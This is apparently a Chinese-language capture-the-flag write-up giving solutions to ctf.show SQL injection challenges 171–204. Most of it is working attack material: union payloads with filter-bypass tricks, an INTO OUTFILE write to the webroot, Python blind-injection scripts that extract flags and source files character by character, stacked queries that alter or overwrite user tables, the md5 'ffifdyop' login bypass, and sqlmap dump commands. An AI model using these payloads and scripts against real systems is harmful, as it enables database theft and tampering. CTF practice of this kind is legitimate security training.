171
order by 判断下
再union select联合查询下,数据库,表,列,字段
flag在password字段里
-1' union select 1,2,password from ctfshow_user --+
172
与171一样,多加了个表少了个列而已
-1' union select username,password from ctfshow_user2 --+
173
同上
1' union select id,username,password from ctfshow_user3--+
1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -
1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -
感觉这两道题出题人屏蔽回显:flag的本意是要对回显进行下编码,可是回显的flag里并不包含flag,所以编码不编码都可以。要是编码可以hex()转下16进制,或者to_base64()等等。
174
可以用replace函数将禁止输出的转换为别的字符,输出后再转回去
0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23
175
如果返回结果中没有ASCII码在 00-7f范围的,才会查询成功。
几乎将上屏蔽了所有的字符,如果root权限的话可以把得到的结果写到一个文件。
0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+
176
过滤了select 大写绕过
-1' union sElect id,username,password from ctfshow_user where username='flag'--+
177
1'and'1'='1
用这个payload,可以检测出过滤了空格
通过注释绕过空格
通过括号绕过空格
反引号对表名字列名字的特殊性
Tab键%09
两个空格代替一个空格,用Tab代替空格,%a0=空格:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
-1'/**/union/**/select/**/id,username,`password`from`ctfshow_user`where`username`='flag'%23
-1'%0bunion%0aselect%09id,username,`password`from`ctfshow_user`where`username`='flag'%23
178
/**/被过滤
-1'%09union%09select%09id,username,password%09from%09ctfshow_user%23
179
-1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%23
180
burp跑id跑出来的
1111111'or(id=26)and'b'='b
1111111’是为了闭合那个!=flag,要没有这句直接输入26就好
181
1111'or(id=26)and'a'='a
182
1111'or(id=26)and'a'='a
183
mysql> select 'xxxyyy' regexp '^xx';
+-----------------------+
| 'xxxyyy' regexp '^xx' |
+-----------------------+
| 1 |
+-----------------------+
1 row in set (0.00 sec)
查询xxxyyy字符串中是否以xx开头,结果值为1,表示值为true,满足条件。
#-*- coding:utf-8 -*-
import string #导入string这个模块
print string.digits #输出包含数字0~9的字符串
print string.letters #包含所有字母(大写或小写)的字符串
print string.lowercase #包含所有小写字母的字符串
print string.uppercase #包含所有大写字母的字符串
print string.punctuation #包含所有标点的字符串
print string.ascii_letters #与string.letters一样
顺便记下吧,要不总忘
regexp函数与like函数用来支持正则表达式
count()是统计,这个sql语句是对table_name表中的所有行记录做个统计,就是查出表中有多少行数据。
用的right,也可以用substr有点不太准确
import requests
import string
str1=string.digits+string.ascii_letters+string.punctuation
url="http://151bb639-2c31-4b57-9012-5efa4339852f.chall.ctf.show:8080/select-waf.php"
flag="}"
for k in range(2,100):
for i in str1:
payload="`ctfshow_user`where(right(pass,%d))like'%s'"%(k,i+flag)
# print(payload)
data={
'tableName':payload
}
talk=requests.post(url=url,data=data)
if "$user_count = 1;" in talk.text:
flag=i+flag
print(flag)
break
184
where被过滤掉了找个可以替代的,并且这个没过滤空格.
用join进行联合查询,即可注入。详细了解join语法可看这篇文章:
https://www.cnblogs.com/reaptomorrow-flydream/p/8145610.html
妈的要被这题气死,因为没看见过滤了单双引号。。tmd改了一下午脚本(写完还忘保存了)
直接搬了两位师傅的,第一个应该是群主师傅的改良版
import requests
#str1="flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}"
url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"
flag = 'flag{'
for i in range(45):
if i <= 5:
continue
for j in range(127):
data = {
"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
}
r = requests.post(url,data=data)
if r.text.find("$user_count = 43;")>0:
if chr(j) != ".":
flag += chr(j)
print(flag.lower())
if chr(j) == "}":
exit(0)
break
import requests
url = '''http://e5e91710-3aa2-4752-a2a0-68a6c18fee26.chall.ctf.show/select-waf.php'''
data = {"tableName":""}
flag = 'flag{'
for x in range(6,50):
for y in r'abcdefghijklmnopqrstuvwxyz0123456789{-}':
#字典:flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz} #群主亲传效率高
temp = "0x"+(flag+y).encode('hex')
data["tableName"]='ctfshow_user x right join ctfshow_user y on left(y.pass,%d) like %s'%(x,temp)
#print(data)
s = requests.post(url,data = data)
#print(s.text)
if '$user_count = 22;' not in s.text:
flag = flag + y
print(flag)
break
185
过滤了数字,
import requests
url = "http://79ef2075-ac91-4c03-adb9-c2319bc040ed.chall.ctf.show:8080/select-waf.php"
flag = ''
def createNum(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n - 1):
num += "+true"
return num
for i in range(50):
for j in range(127):
data = {
"tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
}
r = requests.post(url, data=data)
if "$user_count = 43;" in r.text:
if chr(j)!='.':
flag += chr(j)
print(flag)
break
# flag="W{C71C97F9-5610-45B1-9E29-F3FF73ADD0F6}"
# print(flag.lower())
186
import requests
url = "http://3a7abf5d-8f36-4cab-8058-02c972aa00a0.chall.ctf.show:8080/select-waf.php"
flag = ''
def createNum(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n - 1):
num += "+true"
return num
for i in range(50):
for j in range(127):
data = {
"tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
}
r = requests.post(url, data=data)
if "$user_count = 43;" in r.text:
if chr(j)!='.':
flag += chr(j)
print(flag)
break
# flag="1111IHW{D72377E0-FF80-44C2-9D32-F172DC25E04F}"
# print(flag.lower())
187
md5(string,true)函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返回这样子的字符串:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c
提供两个字符串: ffifdyop、129581926211651571912466741651878684928
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b
188
SELECT * FROM TEST WHERE username = 0
查到全部结果:
USER_ID | USERNAME |
---|---|
1 | Jason |
2 | OOO |
3 | Stack |
4 | Overflow |
username=0 |
pass为0是因为密码比较为弱类型,字符串被转为0
username:0||1
password:0
189
import requests
url="http://9d4a4fc2-c2f3-4f35-8775-3e6d594cac14.chall.ctf.show:8080/api/index.php"
flag=""
for i in range(1,10000):
head=32
tail=127
mid=(head+tail)>>1
while head<tail:
payload="if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},1,0)".format(str(i),str(mid))
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "查询失败" in talk.json()['msg']:
head=mid+1
else:
tail=mid
mid=(head+tail)>>1
flag=flag+chr(head)
print(data)
print(flag)
190
import requests
url="http://76887eea-2b05-4568-8286-11e205eae400.chall.ctf.show:8080//api/"
flag=""
for i in range(1,1000):
head=32
tail=127
mid=(head+tail)>>1
while head<tail:
payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3="select`f1ag`from(ctfshow_fl0g)"
payload="admin' and if(ascii(substr(({0}),{1},1))>{2},1,0) -- ".format(payload3,i,mid)
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "密码错误" == talk.json()['msg']:
head=mid+1
else:
tail=mid
mid=(head+tail)>>1
flag=flag+chr(mid)
print(flag)
191
import requests
url="http://d7d6dff2-db88-497e-ba34-62ef5cb2280c.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
for j in 'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}':
payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3="select`f1ag`from(ctfshow_fl0g)"
payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) and '1'='1".format(payload3,i,j)
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "密码错误" == talk.json()['msg']:
flag+=j
print(flag)
#还可以用ord函数
192
同191
import requests
url="http://f6db9285-fe7d-4699-87e3-c2c239528412.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
payload3="select`f1ag`from(ctfshow_fl0g)"
payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "密码错误" in talk.json()['msg']:
flag+=j
print(flag)
193
import requests
url="http://e2394be5-bf88-4b7c-b742-3fc88ff2a46b.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
payload3="select`f1ag`from(ctfshow_flxg)"
payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "密码错误" in talk.json()['msg']:
flag+=j
print(flag)
#可以用mid,left,right
194
import requests
url="http://9f97023d-32c0-4761-8325-0fdb950b076e.chall.ctf.show:8080/api/"
flag=""
for i in range(1,1000):
for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
payload3="select`f1ag`from(ctfshow_flxg)"
payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
data={
'username':payload,
'password':'1'
}
talk=requests.post(url=url,data=data)
if "密码错误" in talk.json()['msg']:
flag+=j
print(flag)
195
6;update(ctfshow_user)set`username`=6;
6;update(ctfshow_user)set`pass`=123;
username:6
password:123
196
username:6;select(6);
password:6
197-198
username:1;show tables;
password:ctfshow_user
或者用
0;alter table ctfshow_user change column `pass` `ppp`
varchar(255);
alter table ctfshow_user change column `id` `pass` varchar(255);
alter table ctfshow_user change column `ppp` `id` varchar(255);
这种师傅的方法把id和密码调换一下,这样返回值就是id,因为存在admin用户,所以再爆破下password就好,admin需要16进制,因为username没有单引号,不会被当中字符转会出错。
199-200
username:1;show tables;
password:ctfshow_user
201
py sqlmap.py -u http://ef10ecde-5d52-4969-8cce-f6667883b929.chall.ctf.show:8080/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
202
py sqlmap.py http://58b01807-5ef0-4a36-8890-5248a7bd48a9.chall.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
203
py sqlmap.py http://5ce3d12a-eac4-48ad-8dbe-587ebabe5de2.chall.ctf.show:8080/api/index.php --method=PUT --data="id=1" --headers="Content-Type: text/plain" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
204